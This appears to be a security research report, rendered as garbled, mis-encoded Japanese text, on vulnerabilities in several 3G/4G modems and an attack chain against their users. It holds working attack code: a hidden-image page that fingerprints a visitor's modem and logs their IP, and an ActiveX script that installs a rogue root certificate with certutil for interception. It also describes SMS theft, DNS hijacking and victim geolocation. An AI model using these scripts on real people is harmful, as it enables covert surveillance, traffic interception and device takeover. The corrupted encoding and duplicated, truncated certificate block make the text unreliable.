ãã®ã¬ããŒãã¯ãSCADA StrangeloveããŒã ã«ãã£ãŠ2014幎ã«å®äºãã調æ»ã SMSãä»ãã#root ãã®è«ççãªç¶ç¶ã§ãã ãã®ç 究ã¯ãéä¿¡äºæ¥è ã®æ©åšã®è匱æ§ã«é¢ããããåºç¯ãªèšè¿°ã®äžéšãšããŠãã¢ãã ã®è匱æ§ã«éšåçã«ã®ã¿åœ±é¿ãåãŒããŸããã ãã®ããã¥ã¡ã³ãã¯ããã·ã¢ããã³äžçäžã§å©çšå¯èœãª3Gããã³4Gã¢ãã ã®8ã€ã®äžè¬çãªã¢ãã«ã§æ€åºããã³äœ¿çšããããã¹ãŠã®è匱æ§ã®èª¬æãæäŸããŸãã çºèŠãããè匱æ§ã«ãããWebã¹ã¯ãªããïŒRCEïŒãä»»æã®ãã¡ãŒã ãŠã§ã¢å€æŽãã¯ãã¹ãµã€ããªã¯ãšã¹ããã©ãŒãžã§ãªïŒCSRFïŒãã¯ãã¹ãµã€ãã¹ã¯ãªããã£ã³ã°ïŒXSSïŒã§ã®ãªã¢ãŒãã³ãŒãå®è¡ãå¯èœã«ãªããŸãã
ãã®èª¿æ»ã§ã¯ããããã®ã¢ãã ã䜿çšãããã¬ã³ã ã¯ã©ã€ã¢ã³ãã®æãå®å šãªæ»æãã¯ãã«ã»ããã«ã€ããŠã説æããŠããŸããããã¯ãããã€ã¹èå¥ãã³ãŒãã€ã³ãžã§ã¯ã·ã§ã³ãã¢ãã ãæ¥ç¶ãããŠãããŠãŒã¶ãŒã³ã³ãã¥ãŒã¿ãŒã®ææãåœã®SIMã«ãŒããšããŒã¿ã®ååãå å ¥è ã®å Žæãšã¢ã¯ã»ã¹ãªãã¬ãŒã¿ãŒã®ããŒã¿ã«äžã®å人ã¢ã«ãŠã³ããããã³æšçåæ»æïŒAPTïŒã ZeroNights 2015ã䜿çšãããã®èª¿æ»ã®ãã¬ãŒã³ããŒã·ã§ã³ã¹ã©ã€ããããã«ç€ºããŸã ã
è£ åå
次ã®ã¡ãŒã«ãŒã®8ã€ã®ã¢ãã ãæ€èšãããŸããã
- HuaweiïŒ2ã€ã®ç°ãªãã¢ãã ãš1ã€ã®ã«ãŒã¿ãŒïŒã
- GemtekïŒ1ã¢ãã ãš1ã«ãŒã¿ãŒïŒã
- QuantaïŒ2ã¢ãã ïŒã
- ZTEïŒ1ã¢ãã ïŒã
æããã«ããã¹ãŠã®ã¢ãã ã«è匱ãªãã¡ãŒã ãŠã§ã¢ãä»å±ããŠããããã§ã¯ãããŸãããã¢ãã€ã«ãªãã¬ãŒã¿ããã¡ãŒã ãŠã§ã¢ãã«ã¹ã¿ãã€ãºããå Žåããã¡ãŒã ãŠã§ã¢ã®äžéšã®è匱æ§ãèš±å¯ãããŠããŸãã ãã®ãããªçœ²åã¯ããã€ãã®èãã瀺åããŠããŸããïŒ
ããã«ã䟿å®äžããã¹ãŠã®ãããã¯ãŒã¯æ©åšïŒã¢ãã ãšã«ãŒã¿ãŒã®äž¡æ¹ïŒã¯ãã¢ãã ããšåŒã°ããŸãã
è匱ãªã¢ãã çµ±èš
ã¢ãã | åèš |
---|---|
Gemtek1 | 1411 |
Quanta2ãZTE | 1250 |
Gemtek2 | 1409 |
Quanta1 | 946 |
ãã¡ãŒãŠã§ã€ | - |
ããŒã¿ã¯ã2015幎1æ29æ¥ãã2015幎2æ5æ¥ãŸã§ïŒ1é±éïŒSecurityLab.ruããŒã¿ã«ããååçã«åéãããŸããã çµ±èšã¯Huaweiã¢ãã ã«é¢ããæ å ±ãæäŸããŸããããããšãã°æ¬¡ã®ããã«shodan.ioã§åžžã«èŠã€ããããšãã§ããŸãã
èŠã€ãã£ãè匱æ§
æ€èšããããã¹ãŠã®ã¢ãã«ã«ã¯ãã·ã¹ãã ã®å®å šãªäŸµå®³ã«ã€ãªãããããã€ããŸãã¯ä»ã®éåžžã«å±éºãªè匱æ§ãå«ãŸããŠããŸããã ãããã®ã»ãšãã©ãã¹ãŠããªã¢ãŒãã§æäœã§ããŸãïŒã¢ãã ã®äžè¬çãªè¡šãåç §ïŒã èŠã€ãã£ãè匱æ§ã®èª¬æãé倧床å¥ã«ã©ã³ã¯ä»ãïŒ
1. Webã·ããªãªã5ããã€ã¹ïŒRCEïŒã§ã®ãªã¢ãŒãã³ãŒãå®è¡
ã¢ãã ã§èæ ®ããããã¹ãŠã®WebãµãŒããŒã¯ãé©åãªãã£ã«ã¿ãªã³ã°ãã»ãšãã©å®è¡ããªãã£ãåçŽãªCGIã¹ã¯ãªããã«åºã¥ããŠåäœããŸãïŒHuaweiã¢ãã ãé€ããè匱æ§ãçºè¡šãããåŸã®ããã€ãã®æŽæ°åŸïŒã
ãããŠãã¡ããããã¹ãŠã®ã¢ãã ã¯ãã¡ã€ã«ã·ã¹ãã ã§åäœããŸããATã³ãã³ãã®éä¿¡ãSMSã®èªã¿åããšæžã蟌ã¿ããã¡ã€ã¢ãŠã©ãŒã«ã®ã«ãŒã«ã®èšå®ãªã©ãå¿ èŠã§ãã
ããã«ãCSRFã¯ã©ã¹æ»æã«å¯Ÿããä¿è·ã¯å®éã«ã¯ãŸã£ãã䜿çšãããããœãŒã·ã£ã«ãšã³ãžãã¢ãªã³ã°ææ³ã䜿çšããŠãªã¢ãŒãã§ã³ãŒããå®è¡ããæªæã®ãããµã€ããä»ããŠãªã¯ãšã¹ãããªã¢ãŒãéä¿¡ã§ããŸããã äžéšã®ã¢ãã ã§ã¯ãXSSæ»æãå¯èœã§ãã
ãããã®3ã€ã®èŠå ã®çµã¿åããã¯ãæåŸ ã¯ããã®çµæããããããŸããã¢ãã ã®60ïŒ ä»¥äžããªã¢ãŒãã³ãŒãå®è¡ã«å¯ŸããŠè匱ã§ãã ããã«ããã®è匱æ§ã®ãªãæŽæ°ããããã¡ãŒã ãŠã§ã¢ã¯ãHuaweiã¢ãã ã§ã®ã¿å ¥æã§ããŸãïŒè匱æ§ã®å ¬é説æããããŸãïŒãæ®ãã®è匱æ§ã¯ããŸã 0æ¥ãšèŠãªãããŸãã
2.ä»»æã®ãã¡ãŒã ãŠã§ã¢å€æŽã6ããã€ã¹ïŒå®å šæ§æ»æïŒ
3ã€ã®ã¢ãã ã®ã¿ãããã¡ãŒã ãŠã§ã¢ã®æå·åã«ããå€æŽããã®ä¿è·ãåããŠããŸããã 2ã€ã®ã¢ãã ã¯ãé察称æå·åãããRSAãããžã¿ã«çœ²åã¢ãŒãSHA1ãã§ãã¯ãµã ã§äœ¿çšãã3çªç®ã®ã¢ãã ã¯RC4ã¹ããªãŒã æå·ã䜿çšããŠãã¡ãŒã ãŠã§ã¢ã®ã³ã³ãã³ããæå·åããåãã¢ã«ãŽãªãºã ã«åŸã£ãŠåäœããŸããã
æå·åã¢ã«ãŽãªãºã ã®ãã¹ãŠã®å®è£ ã«æ»æãä»æããæŽåæ§ãšæ©å¯æ§ã®äŸµå®³ã«è³ããŸããïŒæåã®ã±ãŒã¹ã§ã¯ãä»»æã®ã³ãŒããå°å ¥ããããšã§ãã¡ãŒã ãŠã§ã¢ãå€æŽã§ããŸãã2çªç®ã®ã±ãŒã¹ã§ã¯ãã¢ã«ãŽãªãºã ã®å®è£ ã®åŒ±ç¹ã«ãããããŒãæœåºããæå·åã¢ã«ãŽãªãºã ã決å®ããããšãã§ããŸãããã¡ãŒã ãŠã§ã¢ã®å 容ãä»»æã«å€æŽããæ©èœã
ããã«3ã€ã®ã¢ãã ã«ã¯ãã¡ãŒã ãŠã§ã¢ã®å€æŽã«å¯Ÿããä¿è·ããããŸããã§ãããããã¡ãŒã ãŠã§ã¢ãæŽæ°ããã«ã¯COMã€ã³ã¿ãŒãã§ã€ã¹ãžã®ããŒã«ã«ã¢ã¯ã»ã¹ãå¿ èŠã§ãã
æ®ãã®2ã€ã®ã¢ãã ã¯ãFOTAãã¯ãããžãŒïŒFirmware Over-The-AirïŒã䜿çšããŠããªãã¬ãŒã¿ãŒã®ãããã¯ãŒã¯ãä»ããŠã®ã¿æŽæ°ããå¯èœæ§ãæäŸããŸããã
3.ã¯ãã¹ãµã€ããªã¯ãšã¹ããã©ãŒãžã§ãªã5ããã€ã¹ïŒCSRFïŒ
CSRFæ»æã¯ããŸããŸãªã¿ã¹ã¯ã«äœ¿çšã§ããŸããããŸã第äžã«-å€æŽããããã¡ãŒã ãŠã§ã¢ããªã¢ãŒãã§ããŠã³ããŒãããä»»æã®ã³ãŒããå®è£ ããŸãã ãã®æ»æã«å¯Ÿããå¹æçãªé²åŸ¡ã¯ããªã¯ãšã¹ãããšã«äžæã®ããŒã¯ã³ã䜿çšããããšã§ãã
4.ã¯ãã¹ãµã€ãã¹ã¯ãªããã£ã³ã°ã4ããã€ã¹ïŒXSSïŒ
ãããã®æ»æã®é©çšç¯å²ã¯éåžžã«åºãããã¹ãã®ææããä»ã®äººã®SMSã®ååãŸã§ã§ãããæã ã®èª¿æ»ã§ã¯ã圌ãã®äž»ãªã¢ããªã±ãŒã·ã§ã³ã¯antiCSRFããã³Same-Origin Policyãã§ãã¯ããã€ãã¹ããä¿®æ£ããããã¡ãŒã ãŠã§ã¢ã®ããŠã³ããŒãã§ããããŸãã
æ»æãã¯ãã«
1.èå¥
ã¢ãã ãžã®æ»æãæåãããã«ã¯ãã¢ãã ãèå¥ããå¿ èŠããããŸãã ãã¡ãããRCEã®è匱æ§ãæªçšããããã«èãããããã¹ãŠã®ãªã¯ãšã¹ããéä¿¡ããããèãããããã¹ãŠã®ã¢ãã¬ã¹ã«èãããããã¹ãŠã®ãã¡ãŒã ãŠã§ã¢ããŒãžã§ã³ãããŠã³ããŒãããããšããããšãã§ããŸãããããã¯éå¹ççã§ãããæ»æããããŠãŒã¶ãŒã«æ°ä»ãããšãã§ããŸãã ããã«ããã®èª¿æ»ã§èæ ®ãããå®éã®éå®éšå®€æ¡ä»¶ã§ã¯ãæææéãéåžžã«éèŠã§ãããŠãŒã¶ãŒãæ€åºãããŠããã³ãŒããå°å ¥ããããŸã§ãã¢ãã ã®èšå®ãå€æŽãããŸãã
ãã®ãããåæ段éã§ã¯ãæ»æãããããã€ã¹ãæ£ããå€æããå¿ èŠããããŸãã ãã®ããã«ãã€ã¡ãŒãžã¢ãã¬ã¹ã®åçŽãªã»ããã䜿çšããããã®ååšã¯ã¢ãã ã®ç¹å®ã®ããŒãžã§ã³ã瀺ããŸãã ãããã£ãŠãåé¡ã®ã¢ãã ã100ïŒ ã®ç²ŸåºŠã§å€å¥ã§ããŸããã 以äžã®ãµã³ãã«ã³ãŒãïŒ
<?php $type = 0; if ($_GET['type']=='1') { $type = 1; } elseif ($_GET['type']=='2') { $type = 2; } elseif ($_GET['type']=='3') { $type = 3; } elseif ($_GET['type']=='4') { $type = 4; } file_put_contents("./log_31337.txt", ($type>0?"2(".$type."):\t":"1:\t"). $_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_CLIENT_IP'].' '.$_SERVER['HTTP_X_FORWARDED_FOR']."\t". date("Ymd H:i:s")."\t".time()."\t". $_SERVER['HTTP_USER_AGENT']."\r\n", FILE_APPEND); ?> <script> function createxmlHttpRequestObject() { var xmlHttp; if (window.ActiveXObject) { try { xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xmlHttp = false; } } else { try { xmlHttp = new XMLHttpRequest(); } catch(e) { xmlHttp = false; } } if (!xmlHttp) {} else {return xmlHttp;} } function HandleServerResponse() { if (xmlHttp.readyState == 4) { } } var xmlHttp = createxmlHttpRequestObject(); function set(type) { if (xmlHttp.readyState == 4 || xmlHttp.readyState == 0) { xmlHttp.open('GET', '?type='+type, true); xmlHttp.onreadystatechange = HandleServerResponse; xmlHttp.send(null); } else { setTimeout(function(){set(type)},1000); } } </script> <img src="http:// 192.168.0.1/img/1.png" style="height:0;width:0;" onload="set('1')"> <img src="http://192.168.0.1/img/2.jpg" style="height:0;width:0;" onload="set('2')"> <img src="http://hostname/img/3.png" style="height:0;width:0;" onload="set('3')"> <img src="http:// 192.168.0.1/img/4.gif" style="height:0;width:0;" onload="set('4')">
2.ã³ãŒãã€ã³ãžã§ã¯ã·ã§ã³
ãã®æ®µéã«ã€ããŠã¯ãåã®ã»ã¯ã·ã§ã³ã®æ®µèœ1ããã³2ã§æ¢ã«è©³çŽ°ã«èª¬æãããŠããŸããWebã¹ã¯ãªããã®ä»»æã®ã³ãŒãå®è¡ã®è匱æ§ããŸãã¯ææãããã¡ãŒã ãŠã§ã¢ã®æŽæ°ãéããŠã³ãŒããæ¿å ¥ã§ããŸãã æåã®æ¹æ³ã§ã¯ã5ã€ã®ã¢ãã ã«åå²ã§ããŸããã
2çªç®ã®æ¹æ³ã®å®è£ ã®ãã¯ãã«ã詳现ã«èª¬æããŸãã
2ã€ã®ã¢ãã ã¯ãã¡ãŒã ãŠã§ã¢ã®æŽåæ§ã確ä¿ããããã«åãã¢ã«ãŽãªãºã ã䜿çšããŸãããSHA1ããã·ã¥ã®RSAé察称ããŒã«ããæå·åã¯ãopensslã©ã€ãã©ãªã䜿çšããŠå®è¡ãããŸããã ãã§ãã¯ã¯èª€ã£ãŠå®è¡ãããŸããïŒãã¡ãŒã ãŠã§ã¢ã®ããŠã³ããŒãã¯ãæ¬è³ªçã«ã¢ãŒã«ã€ãã§ãããWebãµãŒããŒã¯ãããã2ã€ã®ã¡ã€ã³ãã¡ã€ã«ãæœåºããŸãã-ãã§ãã¯ãããããŒã¿ã®ãµã€ãºã瀺ããã¡ã€ã«ãããã³ãã®ããŒã¿ã®çœ²åä»ãããã·ã¥åãå«ããã¡ã€ã«ã 次ã«ããã¡ã€ã«ã·ã¹ãã ããå ¬éããŒãååŸããæ€èšŒã¹ã¯ãªããã¯opensslã©ã€ãã©ãªé¢æ°ã䜿çšããŠçœ²åã解èªããããã·ã¥ã®åèšãæ¯èŒããäžèŽããå Žåã¯ãã¡ãŒã ãŠã§ã¢ãã€ã³ã¹ããŒã«ãããŸããã ãã¡ãŒã ãŠã§ã¢å§çž®ã¢ã«ãŽãªãºã ã«ã¯ç¹ç°æ§ããããŸããïŒåãååã®ãã¡ã€ã«ãæ¢åã®ã¢ãŒã«ã€ãã«è¿œå ã§ããŸãããã¢ãŒã«ã€ãã®æåã®ãã€ãã¯å€æŽãããããã¡ãŒã ãŠã§ã¢ã解åãããšãåŸã®ãã¡ã€ã«ã¯åã®ãã¡ã€ã«ã«çœ®ãæããããŸããã ããã«ããããã§ãã¯å¯Ÿè±¡ã®ããŒã¿ã®æŽåæ§ãå€æŽããããšãªãããã¡ãŒã ãŠã§ã¢ã®å 容ãéåžžã«ç°¡åã«å€æŽã§ããŸãã
3çªç®ã®ã¢ãã ã§ã¯ããã¡ãŒã ãŠã§ã¢ã¯RC4ã¢ã«ãŽãªãºã ãšäžå®ã®ã¬ã³ãã䜿çšããŠæå·åãããŸããã ã€ã³ã¿ãŒãããã§ã¯ãã®ãã¡ãŒã ãŠã§ã¢ã®3ã€ã®ç°ãªãããŒãžã§ã³ãå©çšå¯èœã§ãã£ããããæå·åãããŠããªããã¡ãŒã ãŠã§ã¢ãã¡ã€ã«ã®1ã€ã«ãã€ã0x00ãããå Žæã§ãæ°ãã€ãã®ãã¬ãŒã³ããã¹ããååŸã§ããŸãã
ä»®æ³CD-ROMã®ISOã€ã¡ãŒãžãããã«æœåºããããšã«ããããã¡ãŒã ãŠã§ã¢ã€ã¡ãŒãžã®æå·åã¢ã«ãŽãªãºã ãšæå·åããŒãé 眮ãããã¢ãã¬ã¹ã䜿çšããŠãéšåçã«ãã€ããªãã¡ã€ã«ãæœåºã§ããŸããã ããã«2ã€ã®ãã¡ãŒã ãŠã§ã¢ã®XORã«ãããæå·åããŒã®ã¢ãã¬ã¹ã§ãã¬ãŒã³ããã¹ããæ£ç¢ºã«ååŸããæ£åžžã«æœåºããããšãå¯èœã«ãªããŸããã
æå·ãããã³ã«ãžã®æ»æã®ãµããŒããšæ¯æŽã¯ãDmitry SklyarovãCryptanalyståèªãããã³Positive Technologiesã®ãªããŒã¹ãšã³ãžãã¢ã«ãã£ãŠæäŸãããŸããã
å°æ¥çã«ã¯ããªã¢ãŒãããŒãã®ããã«ãCSRFæ»æãšHTML5é¢æ°ã䜿çšããŠãã¢ããªã±ãŒã·ã§ã³ãCSRFïŒHuaweiã¢ãã çšïŒããä¿è·ãããŠããå Žåããã«ãããŒã/ãã©ãŒã ããŒã¿ãŸãã¯XSSæ»æãéä¿¡ã§ããŸãã 3ã€ã®Huaweiã¢ãã ã®ã¿ãCSRFããä¿è·ãããŠãããXSSã䜿çšããŠãã®ä¿è·ãåé¿ããããšãã§ããã®ã¯ãããã®ã¢ãã ã§ããã ä»ã®ãã¹ãŠã®å ŽåãããŠã³ããŒãã¯ç¹å¥ãªããŒãžã«é 眮ãããHTML5ã³ãŒãã䜿çšããŠå®è¡ã§ããŸãã
Gemtekã¢ãã ã¯ãã³ã³ãã¥ãŒã¿ãŒã«ã€ã³ã¹ããŒã«ãããç¹å¥ãªãŠãŒãã£ãªãã£ãä»ããŠãã¡ãŒã ãŠã§ã¢æŽæ°ã¢ã«ãŽãªãºã ã䜿çšããŸããã ãã®å Žåããã¡ãŒã ãŠã§ã¢ã¯ããã¹ãäžã®ã€ã³ã¿ãŒãããæ¥ç¶ãä»ããŠHTTPãããã³ã«ã䜿çšããŠããŠã³ããŒããããŸããã ããããããŠã³ããŒãããããã¡ãŒã ãŠã§ã¢ã®æŽåæ§å¶åŸ¡ã¡ã«ããºã ã¯ããµãŒããŒãããããŠã³ããŒãããããã§ãã¯ãµã ã®å©ããåããŠäœ¿çšãããŸããã ãã®ã·ããªãªã®æ£ããåäœãæ€èšŒããããšã¯ã§ããŸããã§ããã
ãã ããã¢ãã ãžã®ããŠã³ããŒãæã«æŽåæ§ã誀ã£ãŠãã§ãã¯ããåãã¡ãŒã«ãŒããã¡ãŒã ãŠã§ã¢ã®æŽåæ§ãé©åã«ä¿è·ããããšãæåŸ ãã䟡å€ã¯ãããŸããã
3.ããŒã¿ã®åå
ããã§ãã¢ãã ã§ä»»æã®ã³ãŒããå®è¡ã§ããããã«ãªããŸããã 次ã«ã3ã€ã®ããšãå®è¡ããå¿ èŠããããŸããSMSããã³HTTPãã©ãã£ãã¯ãã€ã³ã¿ãŒã»ããã§ããããã«ããããã«ãã¢ãã ã®å Žæã決å®ããŸãïŒçç±ã¯åŸã§æããã«ãªããŸãïŒã
çŸåšå°ãç¹å®ããæãç°¡åãªæ¹æ³ã¯ãããŒã¹ã¹ããŒã·ã§ã³èå¥åïŒCellIDïŒãèŠã€ããããšã§ãã 次ã«ãMCCããã³MNCãªãã¬ãŒã¿ãŒãç¥ã£ãŠããã°ã opencellid.orgã®ãããªãããªãã¯ããŒã¿ããŒã¹ã䜿çšããŠãæ»æãããäœçœ®ãæ£ç¢ºã«å€æã§ããŸãã ãã1ã€ã®æ¹æ³ã¯ãã¢ãã ã«çµã¿èŸŒãŸããWi-Fiã«ãŒãã䜿çšããããšã§ãããã®ãããè¿ãã®ãããã¯ãŒã¯ãã¹ãã£ã³ããããšã«ããã被害è ã®äœçœ®ãç¹å®ããŸãïŒãŸãã¯ã被害è ã®å¯èœãªå Žæã®ãŸãŒã³ãç¹å®ããŸãã 6ã€ã®ã¢ãã ã§CellIDãååŸã§ãã2ã€ã®ã¢ãã ã§Wi-Fiã䜿çšã§ããŸããã ã¢ãã ã®1ã€ã§ã¯ããããã¯ãŒã¯ã«ãŒãã®æ°ãããã©ã€ããŒãåã³ã³ãã€ã«ããŠããŠã³ããŒãããå¿ èŠããããŸãããçŸåšã®ãã©ã€ããŒã§ã¯ãã¢ãããã¯ã¢ãŒãã§ã®ã¿æ©èœãããã®ã¢ãŒãã§ã¯è¿ãã®ã¢ã¯ã»ã¹ãã€ã³ããã¹ãã£ã³ã§ããŸããã
æ€èšäžã®ã¢ãã ã¯ãSMSã§ã®äœæ¥ã®ãµããŒããšãµããŒããªãã®2çš®é¡ã§ããã ATã³ãã³ããä»ããŠSMSãèªã¿åãæ©èœãæåã«èŠã€ãã人ã倱æããŸããã 2çªç®ã§ã¯ãã¯ãã¹ãµã€ãã¹ã¯ãªããã£ã³ã°ã䜿çšããŠèªã¿åããå¯èœã§ãã éåžžãSMSã¯ãã¡ã€ã«ã·ã¹ãã ã«ä¿åããããããSMSãUSSDã®ãªã¯ãšã¹ããèªãã§éä¿¡ããããã«ç°¡åã«ã¢ã¯ã»ã¹ã§ããŸãã
ãã©ãã£ãã¯ã®ååã¯ããèå³æ·±ããã®ã§ãã ããã€ãã®æ¹æ³ã§å®è£ ã§ããŸãïŒã¢ãã ã®DNSãµãŒããŒã®èšå®ãå€æŽããããšãããã³ã¢ãã ã®ã²ãŒããŠã§ã€ãWi-Fiã€ã³ã¿ãŒãã§ã€ã¹ã«å€æŽãã以åã«å«ãŸããŠããã¢ã¯ã»ã¹ãã€ã³ãã«æ¥ç¶ããããšã ãã¡ãããæåã®æ¹æ³ã¯ç°¡åã§ã;èšå®ã®å€æŽã¯10ç§ã®åé¡ã§ãïŒååãšããŠããããã¯ãã¡ã€ã«ã·ã¹ãã ã«ããããŸãã 1ã€ã®ã¢ãã ãé€ããã¹ãŠã®å Žæã§æåããŸããã 2çªç®ã®ãªãã·ã§ã³ã¯ãçè«çã«ã¯çŽç²ã«èæ ®ãããŸãããã¿ã¹ã¯ã¯ããããã¯ãŒã¯ã«ãŒãã¢ãŒããã¢ãããã¯ããã¢ã¯ãã£ãã«å€æŽããå€éšã®ã¢ã¯ã»ã¹ãã€ã³ãã«æ¥ç¶ããã¢ãã ã®ã«ãŒãã£ã³ã°ãå€æŽããããšã§ããã
HTTPãã©ãã£ãã¯ã ãã§ãªãååããããšãã§ããŸãã HTMLããŒãžã«VBSã³ãŒããå®è£ ããŠå®è¡ããã ãã§ãä¿¡é Œã§ããã«ãŒã蚌ææ©é¢ã«èšŒææžãè¿œå ããMITMãæ£åžžã«å®è¡ã§ããŸãã
<script> function writeFileInIE(filePath, fileContent) { try { var fso = new ActiveXObject("Scripting.FileSystemObject"); var file = fso.OpenTextFile(filePath, 2, true); file.WriteLine(fileContent); file.Close(); } catch (e) { } } writeFileInIE("c:/1.crt", "-----BEGIN CERTIFICATE-----MIICxDCCAi2gAwIBAgIEVbtqxDANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNTA3MzExMjMyMDRaFw0zNTA3MjYxMjMyMDRaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UECBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQb3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBvcnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMW4CYC94Y+hcSowE7Ea4l5hUkycKNi3XW/5GAq+xM+k8YVAEiREGlAly6AzFFjyNngMYiOU8boB2Gv9sRJ7yii+eNT9Dh8plnZdfteCJQqzQrwuwhBag7pdm0zisyjfzWIUQ+FEWMYcBvGqXW85+YqSycQNSZwhh18oiTx1Gq+QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBR24qD42rjplUYYgjbHPInk+QoO3TANBgkqhkiG9w0BAQUFAAOBgQADWcc9RaFvD/trGoeWf5aZHrmtVUjiV9v8qY+Aoed13JpWOfhcpRpEMKeXDA+sm+iylsrq79B770XhLii9Yz2MyoyQ2jRiyTRth17eXr9w7KHnoTeAFgY9STConiqCpBrdZY+h7mXyIq3KzzWQuHuFRt6lL2oSaM/ZEK+KB3ImwA==-----END CERTIFICATE-----"); a=new ActiveXObject("WScript.Shell"); a.run("certutil -addstore -f Root c:/1.crt"); </script>
ã----- BEGIN CERTIFICATE ----- MIICxDCCAi2gAwIBAgIEVbtqxDANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNTA3MzExMjMyMDRaFw0zNTA3MjYxMjMyMDRaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UECBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQb3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBvcnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMW4CYC94Y + hcSowE7Ea4l5hUkycKNi3XW / 5GAq + xMã®+ k8YVAEiREGlAly6AzFFjyNngMYiOU8boB2Gv9sRJ7yii + eNT9Dh8plnZdfteCJQqzQrwuwhBag7pdm0zisyjfzWIUQ + FEWMYcBvGqXW85 + YqSycQNSZwhh18oiTx1Gq + QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH / AgEAMB0GA1UdDgQWBBR24qD42rjplUYYgjbHPInk + QoO3TANBgkqhkiG9w0BAQUFAAOBgQADWcc9RaFvD / trGoeWf5aZHrmtVUjiV9v8qY + Aoed13JpWOfhcpRpEMKeXDA + <script> function writeFileInIE(filePath, fileContent) { try { var fso = new ActiveXObject("Scripting.FileSystemObject"); var file = fso.OpenTextFile(filePath, 2, true); file.WriteLine(fileContent); file.Close(); } catch (e) { } } writeFileInIE("c:/1.crt", "-----BEGIN CERTIFICATE-----MIICxDCCAi2gAwIBAgIEVbtqxDANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNTA3MzExMjMyMDRaFw0zNTA3MjYxMjMyMDRaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UECBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQb3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBvcnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMW4CYC94Y+hcSowE7Ea4l5hUkycKNi3XW/5GAq+xM+k8YVAEiREGlAly6AzFFjyNngMYiOU8boB2Gv9sRJ7yii+eNT9Dh8plnZdfteCJQqzQrwuwhBag7pdm0zisyjfzWIUQ+FEWMYcBvGqXW85+YqSycQNSZwhh18oiTx1Gq+QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBR24qD42rjplUYYgjbHPInk+QoO3TANBgkqhkiG9w0BAQUFAAOBgQADWcc9RaFvD/trGoeWf5aZHrmtVUjiV9v8qY+Aoed13JpWOfhcpRpEMKeXDA+sm+iylsrq79B770XhLii9Yz2MyoyQ2jRiyTRth17eXr9w7KHnoTeAFgY9STConiqCpBrdZY+h7mXyIq3KzzWQuHuFRt6lL2oSaM/ZEK+KB3ImwA==-----END CERTIFICATE-----"); a=new ActiveXObject("WScript.Shell"); a.run("certutil -addstore -f Root c:/1.crt"); </script>
4. SIMã«ãŒãã®åœé ãš2Gãã©ãã£ãã¯ã®åå
SIMã«ãŒãäžã®ã¢ããªã±ãŒã·ã§ã³ãæ»æããæ¹æ³ã®è©³çŽ°ã¯ãKarsten Nohlã®ç 究ãšãSMSçµç±ã®#rootãã®ç 究ã§èª¬æãããŠããŸãã ãã€ããªSMSãSIMã«ãŒãã«éä¿¡ããå¿ èŠããããŸããããã¯ãAPDUãããã³ã«ãä»ããŠSIMã«ãŒãã®ã¢ããªã±ãŒã·ã§ã³ã«ã³ãã³ããéä¿¡ããããã«ã¢ãã ã«æããããšãã§ããªãã£ãããã§ãã
